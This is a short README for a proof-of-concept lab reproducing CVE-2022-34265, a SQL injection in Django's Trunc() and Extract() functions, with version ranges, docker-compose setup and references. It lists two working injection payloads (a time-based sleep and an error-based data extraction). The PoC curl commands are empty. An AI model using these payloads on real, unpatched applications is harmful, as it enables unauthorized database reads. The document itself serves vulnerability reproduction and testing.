# CVE-2022-34265

*PoC for CVE-2022-34265*


## Description

An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The `Trunc()` and `Extract()` database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.

## How to use

### Start

git clone
cd CVE-2022-34265
docker-compose up -d

### Remove

docker-compose down

## Affected Versions

* Django>= 3.2, < 3.2.14

* Django >= 4.0, < 4.0.6

## Patched versions

* Django 3.2.14

* Django 4.0.6

## Verification

### Environment

* Django 4.0.5
* Python 3.8.13
* MySQL 5.7

### Payload

* `YEAR FROM start_time)) ;select sleep(5)--`

* `YEAR FROM start_time)) and updatexml(1,concat(1,(select name from TEST limit 1),1),1)--`

### Poc

curl ""
curl ""

> PS:In the case of different databases, the existence of vulnerabilities is different. The vulnerability does not exist in the MYSQL database backend `Trunc` function.

## Reference

* [Reporter: TAKUTO YOSHIKAI]( (using PostgreSQL)

* [django/django@`877c800`](

* [django/django@`5e2f4dd`](

* [](

* [CVE-2022-34265 Django SQL 注入漏洞调试分析 - 先知社区](